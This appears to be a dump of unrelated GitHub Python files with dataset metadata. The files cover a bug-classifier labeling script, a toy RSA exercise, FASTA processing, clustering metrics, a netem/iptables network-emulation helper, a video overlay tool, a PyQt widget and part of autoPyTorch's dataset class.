'Security':\n # SecurArr.append(Titles[i].value)\n # i = i + 1\n\n #print (len(SecurArr))\n #i = 0\n #for _ in range(10):\n # print (SecurArr[i])\n # i = i + 1\n return FuncArr, NonFuncArr\n\n\ndef WriteResults():\n FuncArr, NonFuncArr = FilterResults()\n \n DataPath = os.getcwd() + \"\\\\Data\"\n if 
(os.path.exists(DataPath)):\n        shutil.rmtree(DataPath)\n    os.mkdir(DataPath)\n\n    DataPathFunc = os.getcwd() + \"\\\\Data\\\\Functional\"\n    if (os.path.exists(DataPathFunc)):\n        shutil.rmtree(DataPathFunc)\n    os.mkdir(DataPathFunc)\n\n    DataPathNonFunc = os.getcwd() + \"\\\\Data\\\\Non-Functional\"\n    if (os.path.exists(DataPathNonFunc)):\n        shutil.rmtree(DataPathNonFunc)\n    os.mkdir(DataPathNonFunc)\n\n    i = 0\n    for x in FuncArr:\n        StringChar = str(i)\n        FileName = \"FuncEx\" + StringChar + \".txt\"\n        file1 = open(DataPathFunc + \"\\\\\" + FileName, \"w+\")\n        file1.write(x)\n        file1.close()\n        i = i + 1\n\n    i = 0\n    stopint = 0\n    for x in NonFuncArr:\n        StringChar = str(i)\n        FileName = \"NonFuncEx\" + StringChar + \".txt\"\n        file1 = open(DataPathNonFunc + \"\\\\\" + FileName, \"w+\")\n        file1.write(x)\n        file1.close()\n        i = i + 1\n        stopint = stopint + 1\n        if (stopint == 20000):\n            break\n\n    #for x in FuncArr:\n    return\n\n\n\n\nif (__name__) == \"__main__\":\n    WriteResults()","repo_name":"pizmiz/Bug-Classifier-App","sub_path":"AI/ManualLabel.py","file_name":"ManualLabel.py","file_ext":"py","file_size_in_byte":3434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"38885649368","text":"\n# Wikipedia pseudocode for modular_pow(base, exponent, modulus):\n#\t c := 1\n# \tfor e_prime = 1 to exponent \n# \t\tc := (c * base) mod modulus\n#\treturn c\n\n\t\ndef mod_pow(base,exponent,modulus):\n\tc = 1\n\tfor e in range(exponent):\n\t\tc = (c * base) % modulus\n\treturn c\n\ndef mPow(b, e, m):\n\tr = 1\n\twhile e > 0:\n\t\tif e % 2 == 1:\n\t\t\tr = (r * b) % m\n\t\te = e >> 1\n\t\tb = (b * b ) % m\n\treturn r\n\n\n#\tsieve of Eratosthenes (mine)\ndef eSieve(n):\n\td = list(range(0,n))\n\tP = [1,2]\n\tp = 2\n\twhile p < n:\n\t\tm = p * p\n\t\twhile m < n:\n\t\t\td[m] = 0\n\t\t\tm += p\n\t\tm = p+1\n\t\twhile m < n and d[m] == 0:\n\t\t\tm += 1\n\t\tif m < n:\n\t\t\tp = d[m]\n\t\t\tP.append(p)\n\t\telse:\n\t\t\tbreak\n\treturn P\t\t\n\n#\tsieve of Eratosthenes (mine)\ndef eSieve1(n):\n\tn = int(n)\n\tP = [1]\n\td = [True] * (n+1)\t\n\tfor p in range(2, n+1):\n\t\tif d[p] :\n\t\t\tP.append(p)\n\t\t\tfor m in range(p * p , n + 1, p):\t\n\t\t\t\td[m] = False\n\treturn P\t\t\n\n\t\n# recursive extended greatest common divisor, implemented from the Wikipedia algorithm\t\t\ndef egcd(a, b):\n\t\tif a == 0:\n\t\t\treturn (b, 0, 1)\n\t\telse:\n\t\t\tg, y, x = egcd( b % a , a)\n\t\t\treturn ( g, x - (b // a) * y, y)\n\n# modular inverse via the extended gcd, from the Wikipedia algorithm\t\t\t\ndef modinv(a,m):\n\tg,x,y = egcd(a,m)\n\tif g != 1:\n\t\treturn None\t# modular inverse does not exist\n\telse:\n\t\treturn x % m\n\t\t\t\t\n\n# make RSA keys from a list of primes and an entry point\ndef make_keys(P,k):\n\tp = P[k]\n\tq = P[k+51]\n\tn = p * q \n\tt = (p-1)*(q-1)\n\ti = 10\n\tm = None\n\twhile m == None:\n\t\te = P[i]\n\t\tm = modinv(e,t)\t\n\t\ti += 1\n\t\t\n\treturn e, m, n\n\t\t\n\ndef encrypt(s, k, m):\n\tba = bytearray(s, 'utf8')\n\n\tw=[]\n\tfor b in ba:\n\t\tw.append(mPow(b,k,m))\n\treturn w\n\t\ndef decrypt(w,k,m):\n\tw=list(w)\n\ts = ''\n\tfor dw in w:\n\t\ts += chr(mPow(dw,k,m) )\n\treturn s\n\t\n\t\ndef main():\n\tP1 = eSieve(10000)\n\tPK , pk, m = make_keys(P1,1001)\n\t\n\tt1 = mPow(65,PK,m)\n\tt2 = mPow(t1,pk,m)\n\tprint(t1,t2)\n\t\n\ts1 = \"this is a test, this is not a good test, but never the less this is a test keith R. 
Bergerstock...\"\n\tprint(s1)\n\t\n\trsa = encrypt(s1 ,PK,m)\n\tprint(rsa)\n\t\n\tb = decrypt(rsa, pk,m)\n\tprint(b)\n\n\n\t\nif __name__ == '__main__':\n main()\n","repo_name":"kbergerstock/myProjects","sub_path":"projects.python/thinkCSpy.examples/rsa.py","file_name":"rsa.py","file_ext":"py","file_size_in_byte":2015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"1051531120","text":"import Bio.SeqIO as SeqIO\n\n# for seq_record in SeqIO.parse(\"/data1/projectpy/DeepFam/seq2logo-2.1/PF00571_full_length_sequences.fasta\", \"fasta\"):\n#\n# print(seq_record.id)\n#\nclass seqObj(object):\n def __init__(self, id, desc, seq):\n self.id = id\n self.desc = desc\n self.seq = seq\n\n\n\nseq_length = 0\nseq_dict = {}\nseq_list =[]\nfirst_line = True\n#seq_list = list(SeqIO.parse(\"/data1/projectpy/cnnTensorflow/data/CaricaPapaya/protease.lib\", \"fasta\"))\ni = 0\nwith open(\"/data1/projectpy/cnnTensorflow/data/CaricaPapaya/protease1.lib\", 'r') as infile:\n for row in infile:\n #print(\"line:\", i)\n if row.startswith(\">\"):\n if not first_line:\n seq = \"\"\n for se in seqs:\n seq += se.rstrip()\n\n seq_list.append(seqObj(id, desc, seq))\n first_line = False\n\n seqs = []\n id, desc = row.split(\" \", 1)\n #desc = desc.rstrip()\n id = str.replace(id, \">\", \"\")\n #print(\"id:\", id)\n else:\n seqs.append(row)\n i +=1\n\n\nprint(\"total protease.lib sequence is:\", len(seq_list))\nfor seq_record in seq_list:\n if seq_record.id not in seq_dict:\n seq_dict[seq_record.id] = seq_record\n else:\n print(\"duplicate id:\", seq_record.id)\n\nprint(\"total unique protease.lib sequence is:\", len(seq_dict))\n\n\ntarget_seq = []\nali_seq_list = list(SeqIO.parse(\"/data1/projectpy/cnnTensorflow/data/CaricaPapaya/c1a.fa\", \"fasta\"))\nprint(\"total c1a.fa sequence is:\", len(ali_seq_list))\nfor seq_record in ali_seq_list:\n if seq_record.id in seq_dict:\n # ali_seq_dict[seq_record.id] = seq_record.seq\n target_seq.append(seq_dict[seq_record.id])\n\nprint(\"c1a_seq.fa sequence is:\", len(target_seq))\n\nwith open(\"/data1/projectpy/cnnTensorflow/data/CaricaPapaya/c1a_seq.fa\", 'w') as output_handle:\n for seqO in target_seq:\n #print(\">%s %s\" % (seqO.id, seqO.desc))\n outh = seqO.id+' '+seqO.desc\n print(outh)\n output_handle.write(outh)\n output_handle.write(\"%s\\n\" % seqO.seq)\n\n #SeqIO.write(target_seq, output_handle, \"fasta\")\n\n\n\n\n","repo_name":"mycstar/cnnTensorflow","sub_path":"CaricaPapaya/dataHandler.py","file_name":"dataHandler.py","file_ext":"py","file_size_in_byte":2149,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"17946291250","text":"import pandas as pd\n\nlyrics = pd.read_csv('darklyrics.csv')\n\nbandalbumcountry = pd.read_csv('bandalbum.csv')\n\nfor row in bandalbumcountry.itertuples(index=True, name='Pandas'):\n band = getattr(row, 'band')\n album = getattr(row, 'album')\n country = getattr(row, 'country')\n\n newname = band + \" (\" + country.lower().capitalize() + \")\"\n\n lyrics.loc[(lyrics['band'] == band) & (lyrics['album'] == album), 'band'] = newname\n\nlyrics.to_csv('darklyrics2.csv')\n","repo_name":"lorenzomammana/metal-subgenres-classification","sub_path":"dataset-extraction/addbandname.py","file_name":"addbandname.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"35086075614","text":"\"\"\"This modules contains functions to streamline 
optimizations.\"\"\"\n\nfrom typing import List\n\nfrom modules import analysis_util\nfrom modules import benchmark_pipeline\nfrom modules import clustering_algorithms\nfrom modules import icon_finder_shape_context\nimport numpy as np\n\n\ndef dbscan_clustering_optimizer(eps_values: List[float],\n min_samples: List[int], tfrecord_path: str,\n multi_instance_icon: bool):\n \"\"\"Plots recall given different DBSCAN clustering hyperparameters.\n\n User can check the plots to visually check what the overall trend is to\n determine what the next set of hyperpameters to try next (ie, what direction\n the recall is moving). We make a plot of min samples and recall for each\n epsilon value fixed, and we also make a final plot of epsilon and recall\n using the min sample value that maximizes recall.\n\n Arguments:\n eps_values: List of dbscan epsilon hyperparameters to try out.\n min_samples: List of dbscan min_sample hyperparameters to try out.\n tfrecord_path: The path to the dataset to run this experiment on.\n multi_instance_icon: Whether the dataset is single-instance\n or multi-instance.\n \"\"\"\n recall_eps = []\n for eps in eps_values:\n recall_min_samples = []\n for samples in min_samples:\n icon_finder = icon_finder_shape_context.IconFinderShapeContext(\n clusterer=clustering_algorithms.DBSCANClusterer(eps=eps,\n min_samples=samples))\n benchmark = benchmark_pipeline.BenchmarkPipeline(\n tfrecord_path=tfrecord_path)\n correctness, _, _ = benchmark.evaluate(\n multi_instance_icon=multi_instance_icon,\n icon_finder_object=icon_finder)\n recall_min_samples.append(correctness.recall)\n recall_eps.append(np.max(np.array(min_samples)))\n analysis_util.generate_scatterplot(\n x=min_samples,\n y=recall_min_samples,\n title=\"Effect of min samples on recall (Eps = %d)\" % eps,\n xlabel=\"Min samples\",\n ylabel=\"Recall\",\n output_path=\"min-samples-%d.png\" % eps,\n connect_points=False)\n analysis_util.generate_scatterplot(\n x=eps_values,\n y=recall_eps,\n title=\"Effect of eps on recall (Min sample = best of \" +\n \" \".join(map(str, min_samples)),\n xlabel=\"Epsilon Value\",\n ylabel=\"Recall\",\n output_path=\"best-epsilon-recall.png\",\n connect_points=False)\n\n\nif __name__ == \"__main__\":\n dbscan_clustering_optimizer(\n eps_values=[7.5, 7.6, 7.7, 7.8],\n min_samples=[2, 3, 4, 5],\n tfrecord_path=\"datasets/large_single_instance_v2.tfrecord\",\n multi_instance_icon=False)\n","repo_name":"googleinterns/acuiti","sub_path":"modules/optimizer.py","file_name":"optimizer.py","file_ext":"py","file_size_in_byte":2706,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"78"} +{"seq_id":"9206822882","text":"from typing import Optional\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\n\n\nclass MetricTable:\n def __init__(self) -> None:\n self.frames = []\n\n def add_frame(self, frame: pd.DataFrame) -> None:\n self.frames.append(frame)\n\n # pylint: disable=too-many-arguments\n def add_to_frame(self,\n ari: float,\n ami: float,\n inertia: float,\n time: float,\n name: Optional[str] = 'Experiment'\n ) -> None:\n data = {'ARI': f'{ari:.2f}', 'AMI': f'{ami:.2f}',\n 'Inertia': f'{inertia:.2f}', 'Time': f'{time:.2f}'}\n frame = pd.DataFrame(data, [name])\n self.frames.append(frame)\n\n def add_empty_frame(self, time: bool) -> None:\n empty = 'N/A'\n data = {'ARI': empty, 'AMI': empty}\n if time:\n data['Time'] = empty\n frame = pd.DataFrame(data, [empty])\n self.frames.append(frame)\n\n def get_table(self) -> pd.DataFrame:\n return 
pd.concat(self.frames, join=\"inner\")\n\n def get_latex_table(self, caption: str = '') -> str:\n table = self.get_table()\n return table.to_latex(index=True, escape=True, caption=caption)\n\n\ndef insert_hline(latex_str: str) -> str:\n lines_strings = latex_str.splitlines()\n result = []\n\n for line in lines_strings:\n if 'N/A' in line:\n result.append('\\\\midrule')\n else:\n result.append(line)\n result = '\\n'.join(result)\n return result\n\n\nclass MetricMeter:\n def __init__(self) -> None:\n self.ari = []\n self.ami = []\n self.inertia = []\n self.time = []\n\n def add_ari(self, value: float) -> None:\n self.ari.append(value)\n\n def add_ami(self, value: float) -> None:\n self.ami.append(value)\n\n def add_inertia(self, value: float) -> None:\n self.inertia.append(value)\n\n def add_time(self, value: float) -> None:\n self.time.append(value)\n\n def add_combination(self, ari: float, ami: float, inertia: float, time: float) -> None:\n self.add_ari(abs(ari))\n self.add_ami(abs(ami))\n self.add_inertia(inertia)\n self.add_time(time)\n\n def get_average(self) -> tuple[float, float, float, float]:\n return float(np.mean(self.ari)), float(np.mean(self.ami)), \\\n float(np.mean(self.inertia)), float(np.mean(self.time))\n\n\nclass GraphicMeter(MetricMeter):\n def __init__(self, base: list, base_name: str) -> None:\n super().__init__()\n self.base = base\n self.base_name = base_name\n\n def get_graph(self, key: str):\n values = {'ARI': self.ari, 'AMI': self.ami,\n 'Inertia': self.inertia, 'Time': self.time}\n\n fig, ax = plt.subplots(figsize=(5, 4))\n param = values[key]\n ax.plot(self.base, param, '-o')\n ax.grid(True, color='gray', linestyle='--', linewidth=0.5)\n\n if self.base_name == 'p':\n ax.set_xticks(self.base)\n else:\n ax.set_xticks(np.linspace(0, 1, 11))\n ax.set_xlabel(self.base_name)\n\n if key in ('ARI', 'AMI'):\n ax.set_yticks(np.arange(0, 1.1, 0.1))\n else:\n ax.set_yticks(np.linspace(np.min(param), np.max(param), 10))\n ax.set_ylabel(key)\n # ax.set_title(f'{key} vs. 
{self.base_name}')\n return fig\n","repo_name":"alexgiving/LKMeans","sub_path":"lkmeans/report/metric_meter.py","file_name":"metric_meter.py","file_ext":"py","file_size_in_byte":3404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"34019423300","text":"from lib.command import Command\r\nimport sys\r\nimport getopt\r\n\r\nif __name__ == '__main__':\r\n opts, args = getopt.getopt(sys.argv[1:], 'g', ['gui'])\r\n for o, a in opts:\r\n if o in ('-g', '--gui'):\r\n from lib.gui.main_window import MainWindow\r\n MainWindow()\r\n sys.exit()\r\n argv = []\r\n kw = {}\r\n for a in args:\r\n if '=' in a:\r\n k, v = a.split('=')\r\n kw[k] = v\r\n else:\r\n argv.append(a)\r\n\r\n Command(*argv, **kw)()\r\n","repo_name":"tsaiminghan/pyGNovelDL","sub_path":"commandline.py","file_name":"commandline.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"665604956","text":"import subprocess\nimport re\n\ndef get_my_ip():\n response = subprocess.Popen(['ip', 'addr', 'show'],\n stdout=subprocess.PIPE).stdout.read().decode('utf-8')\n ips = re.findall(r'172\\.\\d+\\.\\d+\\.\\d+', response)\n return ips[0]\n\ndef update_emulation_engine(params):\n if params['loss_model'] == 'random':\n loss_cmd = '' if params[\"loss\"] == '0' else f'loss random {params[\"loss\"]}'\n elif params['loss_model'] == 'gi':\n P = float(params['P'])\n E_B = float(params['E_B'])\n rho = float(params['rho'])\n P_isol = float(params['P_isol'])\n E_GB = float(params['E_GB'])\n p31 = 100 * 1 / (E_B * rho)\n p13 = 100 * (P - P_isol)/(E_B * (1 - P_isol) * (rho - P))\n p23 = 100 * 1 / (E_GB)\n p32 = 100 * (1 - rho) / (rho * E_GB)\n p14 = 100 * P_isol / (1 - P_isol)\n loss_cmd = f'loss state {p13} {p31} {p32} {p23} {p14}'\n cmd = [\n 'tc qdisc replace dev eth0 root netem',\n f'delay {params[\"latency\"]}ms',\n '' if params[\"jitter\"] == '0' else f'{params[\"jitter\"]}ms distribution {params[\"dist\"]}',\n loss_cmd,\n '' if params[\"rate\"] == '' else f'rate {params[\"rate\"]}kbit'\n ]\n subprocess.run(' '.join(cmd), shell=True)\n\ndef init_iptables():\n my_ip = get_my_ip()\n host_ip = re.sub(r'\\d+$', '1', my_ip)\n subprocess.run(\n f'iptables -t nat -A PREROUTING -p tcp --dport 90 -j RETURN',\n shell=True\n )\n subprocess.run(\n f'iptables -t nat -A PREROUTING -d {my_ip}/32 -j DNAT --to-destination {host_ip}',\n shell=True\n )\n subprocess.run(\n f'iptables -t nat -A POSTROUTING -s {host_ip}/32 -j SNAT --to-source {my_ip}',\n shell=True\n )","repo_name":"m2-farzan/Fisne","sub_path":"core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"37383378650","text":"# get_overlay should get the overlay for the community \n\ndef get_overlay(revolution_id):\n pass\n\nfrom moviepy.editor import VideoFileClip, ImageClip, CompositeVideoClip, clips_array\nfrom PIL import Image\nimport os \nfrom moviepy.video.fx.all import resize\nfrom scipy.ndimage.filters import gaussian_filter\nimport numpy as np\n\ndef gaussian_blur(image, sigma):\n \"\"\"Applies Gaussian blur to an image.\"\"\"\n blurred = gaussian_filter(image.astype(float), sigma=(sigma, sigma, 0))\n return np.array(blurred, dtype=np.uint8)\n\ndef add_overlay(clip_path, output_path, overlay_path):\n # Load the overlay image with Pillow to get its size\n overlay_image = Image.open(overlay_path)\n overlay_width, 
overlay_height = overlay_image.size\n\n    # Load the video clip\n    clip = VideoFileClip(clip_path)\n\n    # Calculate the ratio for resizing the video\n    ratio = min(overlay_width / clip.w, overlay_height / clip.h)\n\n    # Resize the video to fit within the overlay\n    resized_clip = clip.fx(resize, ratio)\n\n    low_quality_clip = clip.fx(resize, 0.5) \n\n    # Create a blurred background and resize to fit the overlay\n    blur_clip = low_quality_clip.fl_image(lambda image: gaussian_blur(image, sigma=10))\n    blur_clip = blur_clip.fx(resize, height=overlay_height)\n\n    resized_clip = resized_clip.set_position('center')\n\n    composed_clip = CompositeVideoClip([blur_clip, resized_clip], size=(overlay_width, overlay_height))\n\n    # Create an ImageClip from the overlay\n    overlay_clip = ImageClip(overlay_path, duration=composed_clip.duration)\n\n    # Overlay the image on the video clip\n    final_clip = CompositeVideoClip([composed_clip, overlay_clip])\n\n    # Write the final clip to a file\n    final_clip.write_videofile(output_path)\n\ndef add_overlay_to_many(input_dir, output_dir, overlay_path):\n    # Get a list of all files in the directory\n    files = os.listdir(input_dir)\n    \n    # Filter out non-video files\n    video_files = [f for f in files if f.endswith(('.mp4', '.flv', '.mkv', '.webm', '.avi'))]\n    \n    for video_file in video_files:\n        add_overlay(os.path.join(input_dir, video_file), os.path.join(output_dir, video_file), overlay_path)\n\ninput_directory = \"./output/extracted_action\"\noutput_directory = \"./output/overlayed\"\noverlay_path = \"./assets/overlay.png\"\n\n# Usage\nif __name__ == \"__main__\":\n    add_overlay_to_many(input_directory, output_directory, overlay_path)\n","repo_name":"collectivexyz/collab-generator","sub_path":"add_overlay.py","file_name":"add_overlay.py","file_ext":"py","file_size_in_byte":2402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"8777350927","text":"def fact(n):\r\n    if n<=1:  # 0! and 1! are both 1; this also stops the recursion for the digit 0\r\n        return 1\r\n    else:\r\n        return n*fact(n-1)\r\nsum,temp=0,0\r\nn=int(input())\r\ntemp=n\r\nwhile n!=0:\r\n    r=n%10\r\n    sum=sum+fact(r)\r\n    n=n//10\r\n# compare only after all digits are processed, not on every loop iteration\r\nif sum==temp:\r\n    print(\"strong number\")\r\nelse:\r\n    print(\"not a strong number\")","repo_name":"YAMINISAIMARISETTI/python-crt","sub_path":"exp73.py","file_name":"exp73.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"15831553199","text":"from PyQt5 import Qt\r\nfrom Code.Widgets.BuiltInWidgets import *\r\nimport datetime\r\n\r\n\r\n# create a widget that includes clickable widgets which function as shortcut keys\r\nclass ShortCutButtons(CreateLayoutWidget):\r\n    def __init__(self, layout=None):\r\n        # adding the row of the shortcut buttons\r\n        CreateLayoutWidget.__init__(self, None, 'ShortCutsLayoutWidget', layout=layout)\r\n        layout = CreateHorizontalLayout(self, 0, \"ShortCutsLayout\")\r\n        self.setLayout(layout)\r\n\r\n        self.ButtonsObjectsList = []\r\n        for text in ['Today', 'Tomorrow', 'Next Week', 'Next Weekend']:\r\n            label = CreateLabel(None, 8, text, f'{text} label', Layout=self.layout())\r\n            label.setAlignment(Qt.Qt.AlignCenter)\r\n            label.setStyleSheet(\r\n                \"QFrame {border-radius: 10px; border: 2px solid; padding-right: 5px; padding-left: 5px;}\")\r\n            #label.clicked.connect(print(text))\r\n            self.ButtonsObjectsList.append(label)\r\n\r\n        self.GetTomorrowDate()\r\n        self.GetNextWeekDate()\r\n        self.GetNextWeekEndDate()\r\n\r\n    def GetTomorrowDate(self):\r\n        date = datetime.date.today() + 
datetime.timedelta(1)\r\n        date_tuple = date.timetuple()[:3]\r\n        print(date_tuple)\r\n        #return date_tuple\r\n\r\n    def GetNextWeekDate(self):\r\n        date = datetime.date.today() + datetime.timedelta(7)\r\n        date_tuple = date.timetuple()[:3]\r\n        print(date_tuple)\r\n        # return date_tuple\r\n\r\n    def GetNextWeekEndDate(self):\r\n        # go through the week to find the next time there is a Friday\r\n        for d in range(8):\r\n            date = datetime.date.today() + datetime.timedelta(d)\r\n            print(date.strftime(\"%w\"))\r\n            if date.strftime(\"%w\") == \"5\":\r\n                print(date.timetuple()[:3])\r\n\r\n\r\n\r\n","repo_name":"EranXH/Task-Manager","sub_path":"Task Manager Client/Code/Widgets/DataTime/ShortCutButtons.py","file_name":"ShortCutButtons.py","file_ext":"py","file_size_in_byte":1823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"271035691","text":"import os\nimport uuid\nfrom abc import ABCMeta\nfrom typing import Any, Dict, List, Optional, Sequence, Tuple, Union, cast\n\nimport numpy as np\n\nfrom scipy.sparse import issparse\n\nfrom sklearn.utils.multiclass import type_of_target\n\nfrom torch.utils.data import Dataset, Subset\n\nimport torchvision\n\nfrom autoPyTorch.constants import CLASSIFICATION_OUTPUTS, STRING_TO_OUTPUT_TYPES\nfrom autoPyTorch.datasets.resampling_strategy import (\n    CrossValFunc,\n    CrossValFuncs,\n    CrossValTypes,\n    DEFAULT_RESAMPLING_PARAMETERS,\n    HoldOutFunc,\n    HoldOutFuncs,\n    HoldoutValTypes,\n    NoResamplingFunc,\n    NoResamplingFuncs,\n    NoResamplingStrategyTypes,\n    ResamplingStrategies\n)\nfrom autoPyTorch.utils.common import FitRequirement, ispandas\n\nBaseDatasetInputType = Union[Tuple[np.ndarray, np.ndarray], Dataset]\nBaseDatasetPropertiesType = Union[int, float, str, List, bool, Tuple]\n\n\ndef check_valid_data(data: Any) -> None:\n    if not all(hasattr(data, attr) for attr in ['__getitem__', '__len__']):\n        raise ValueError(\n            'The specified Data for Dataset must have both __getitem__ and __len__ attribute.')\n\n\ndef type_check(train_tensors: BaseDatasetInputType,\n               val_tensors: Optional[BaseDatasetInputType] = None) -> None:\n    \"\"\"To avoid unexpected behavior, we use loops over indices.\"\"\"\n    for i in range(len(train_tensors)):\n        check_valid_data(train_tensors[i])\n    if val_tensors is not None:\n        for i in range(len(val_tensors)):\n            check_valid_data(val_tensors[i])\n\n\ndef _get_output_properties(train_tensors: BaseDatasetInputType) -> Tuple[int, str]:\n    \"\"\"\n    Return the output dimension and output type inferred from the target labels.\n\n    Args:\n        train_tensors (BaseDatasetInputType):\n            Training data.\n\n    Returns:\n        output_dim (int):\n            The dimension of outputs.\n        output_type (str):\n            The output type according to sklearn specification.\n    \"\"\"\n    if isinstance(train_tensors, Dataset):\n        target_labels = np.array([sample[-1] for sample in train_tensors])\n    else:\n        target_labels = np.array(train_tensors[1])\n\n    output_type: str = type_of_target(target_labels)\n    if STRING_TO_OUTPUT_TYPES[output_type] in CLASSIFICATION_OUTPUTS:\n        output_dim = len(np.unique(target_labels))\n    elif target_labels.ndim > 1:\n        output_dim = target_labels.shape[-1]\n    else:\n        output_dim = 1\n\n    return output_dim, output_type\n\n\nclass TransformSubset(Subset):\n    \"\"\"Wrapper of BaseDataset for split datasets\n\n    Since the BaseDataset contains all the data points (train/val/test),\n    we require a different transformation for each data point.\n    This class helps to take the subset of the dataset\n    with either the training or the validation transformation.\n    The 
TransformSubset allows adding train flags\n    while indexing the main dataset towards this goal.\n\n    Attributes:\n        dataset (BaseDataset/Dataset): Dataset to sample the subset\n        indices (Sequence[int]): Indices to sample from the dataset\n        train (bool): If we apply train or validation transformation\n\n    \"\"\"\n\n    def __init__(self, dataset: Dataset, indices: Sequence[int], train: bool) -> None:\n        self.dataset = dataset\n        self.indices = indices\n        self.train = train\n\n    def __getitem__(self, idx: int) -> np.ndarray:\n        return self.dataset.__getitem__(self.indices[idx], self.train)\n\n\nclass BaseDataset(Dataset, metaclass=ABCMeta):\n    def __init__(\n        self,\n        train_tensors: BaseDatasetInputType,\n        dataset_name: Optional[str] = None,\n        val_tensors: Optional[BaseDatasetInputType] = None,\n        test_tensors: Optional[BaseDatasetInputType] = None,\n        resampling_strategy: ResamplingStrategies = HoldoutValTypes.holdout_validation,\n        resampling_strategy_args: Optional[Dict[str, Any]] = None,\n        shuffle: Optional[bool] = True,\n        seed: Optional[int] = 42,\n        train_transforms: Optional[torchvision.transforms.Compose] = None,\n        val_transforms: Optional[torchvision.transforms.Compose] = None,\n    ):\n        \"\"\"\n        Base class for datasets used in AutoPyTorch\n        Args:\n            train_tensors (A tuple of objects that have a __len__ and a __getitem__ attribute):\n                training data\n            dataset_name (str): name of the dataset, used as experiment name.\n            val_tensors (An optional tuple of objects that have a __len__ and a __getitem__ attribute):\n                validation data\n            test_tensors (An optional tuple of objects that have a __len__ and a __getitem__ attribute):\n                test data\n            resampling_strategy (RESAMPLING_STRATEGIES: default=HoldoutValTypes.holdout_validation):\n                strategy to split the training data.\n            resampling_strategy_args (Optional[Dict[str, Any]]): arguments\n                required for the chosen resampling strategy. 
If None, uses\n the default values provided in DEFAULT_RESAMPLING_PARAMETERS\n in ```datasets/resampling_strategy.py```.\n shuffle: Whether to shuffle the data before performing splits\n seed (int: default=1): seed to be used for reproducibility.\n train_transforms (Optional[torchvision.transforms.Compose]):\n Additional Transforms to be applied to the training data\n val_transforms (Optional[torchvision.transforms.Compose]):\n Additional Transforms to be applied to the validation/test data\n \"\"\"\n\n if dataset_name is None:\n self.dataset_name = str(uuid.uuid1(clock_seq=os.getpid()))\n else:\n self.dataset_name = dataset_name\n\n if not hasattr(train_tensors[0], 'shape'):\n type_check(train_tensors, val_tensors)\n self.train_tensors, self.val_tensors, self.test_tensors = train_tensors, val_tensors, test_tensors\n self.cross_validators: Dict[str, CrossValFunc] = {}\n self.holdout_validators: Dict[str, HoldOutFunc] = {}\n self.no_resampling_validators: Dict[str, NoResamplingFunc] = {}\n self.random_state = np.random.RandomState(seed=seed)\n self.shuffle = shuffle\n self.resampling_strategy = resampling_strategy\n self.resampling_strategy_args = resampling_strategy_args\n self.task_type: Optional[str] = None\n self.issparse: bool = issparse(self.train_tensors[0])\n self.input_shape: Tuple[int] = self.train_tensors[0].shape[1:]\n if len(self.train_tensors) == 2 and self.train_tensors[1] is not None:\n self.output_shape, self.output_type = _get_output_properties(self.train_tensors)\n\n # TODO: Look for a criteria to define small enough to preprocess\n self.is_small_preprocess = True\n\n # Make sure cross validation splits are created once\n self.cross_validators = CrossValFuncs.get_cross_validators(*CrossValTypes)\n self.holdout_validators = HoldOutFuncs.get_holdout_validators(*HoldoutValTypes)\n self.no_resampling_validators = NoResamplingFuncs.get_no_resampling_validators(*NoResamplingStrategyTypes)\n\n self.splits = self.get_splits_from_resampling_strategy()\n\n # We also need to be able to transform the data, be it for pre-processing\n # or for augmentation\n self.train_transform = train_transforms\n self.val_transform = val_transforms\n\n def update_transform(self, transform: Optional[torchvision.transforms.Compose],\n train: bool = True) -> 'BaseDataset':\n \"\"\"\n During the pipeline execution, the pipeline object might propose transformations\n as a product of the current pipeline configuration being tested.\n\n This utility allows to return self with the updated transformation, so that\n a dataloader can yield this dataset with the desired transformations\n\n Args:\n transform (torchvision.transforms.Compose):\n The transformations proposed by the current pipeline\n train (bool):\n Whether to update the train or validation transform\n\n Returns:\n self: A copy of the update pipeline\n \"\"\"\n if train:\n self.train_transform = transform\n else:\n self.val_transform = transform\n return self\n\n def __getitem__(self, index: int, train: bool = True) -> Tuple[np.ndarray, ...]:\n \"\"\"\n The base dataset uses a Subset of the data. 
Nevertheless, the base dataset expects\n both validation and test data to be present in the same dataset, which motivates\n the need to dynamically give train/test data with the __getitem__ command.\n\n This method yields a datapoint of the whole data (after a Subset has selected a given\n item, based on the resampling strategy) and applies a train/testing transformation, if any.\n\n Args:\n index (int): what element to yield from all the train/test tensors\n train (bool): Whether to apply a train or test transformation, if any\n\n Returns:\n A transformed single point prediction\n \"\"\"\n\n X = self.train_tensors[0].iloc[[index]] if ispandas(self.train_tensors[0]) \\\n else self.train_tensors[0][index]\n\n if self.train_transform is not None and train:\n X = self.train_transform(X)\n elif self.val_transform is not None and not train:\n X = self.val_transform(X)\n\n # In case of prediction, the targets are not provided\n Y = self.train_tensors[1][index] if self.train_tensors[1] is not None else None\n\n return X, Y\n\n def __len__(self) -> int:\n return int(self.train_tensors[0].shape[0])\n\n def _get_indices(self) -> np.ndarray:\n return self.random_state.permutation(len(self)) if self.shuffle else np.arange(len(self))\n\n def get_splits_from_resampling_strategy(self) -> List[Tuple[List[int], Optional[List[int]]]]:\n \"\"\"\n Creates a set of splits based on a resampling strategy provided\n\n Returns\n (List[Tuple[List[int], List[int]]]): splits in the [train_indices, val_indices] format\n \"\"\"\n splits = []\n if 